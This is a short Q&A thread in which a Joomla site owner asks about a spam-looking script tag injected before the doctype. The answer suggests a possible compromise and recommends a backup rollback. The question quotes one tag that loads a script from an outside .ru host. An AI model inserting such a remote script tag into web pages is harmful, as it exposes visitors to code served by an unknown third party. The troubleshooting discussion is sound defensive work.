# Spam looking script tag on top of joomla site

Tags: joomla, spam

I have a joomla site running but recently I noticed a script tag at the top of the page that looks spammy.

```
<script type="text/javascript" src="http://lhljoi.ru/tmp/go2.php?site=13"></script>
```

This tag is even before the doctype element.

I won't be able to share the site's url since boss hasn't allowed to.

Please help.

Thanks!

Answer (score 1, accepted):

If this code is not added by your team, it can be someone who hacked your systems and modified the files, particulary when its placed even before the doctype. Check with your server administration team and look for any other infected sites on same server. Or try to roll back to a previous backup

Comment: Thanks Team! A seasonal coder ended up adding that script tag. It's resolved now.